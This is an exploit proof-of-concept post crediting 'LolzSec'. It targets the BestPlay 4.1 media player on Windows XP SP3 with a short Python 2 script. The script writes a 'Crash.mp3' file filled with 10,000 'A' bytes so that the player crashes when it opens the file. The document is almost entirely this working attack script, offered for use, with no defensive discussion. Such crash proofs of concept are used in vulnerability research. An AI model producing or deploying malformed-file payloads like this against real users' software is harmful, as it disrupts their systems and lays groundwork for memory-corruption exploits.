# Exploit Title: BestPlay v4.1 (.mp3) Crash PoC # Version: 4.1 # Date: 2012-10-18 # Software Link: http://www.procesualitatea.ro/bestplay/ # Author: LolzSec # Tested on: Windows XP SP3 # Greeting To : Da'One #!/usr/bin/python file="Crash.mp3" crash="\x41" * 10000 try: print "[*] Creating exploit file...\n" writeFile = open (file, "w") writeFile.write(crash) writeFile.close() print "[*] File successfully created!" except: print "[*] Error while creating file!"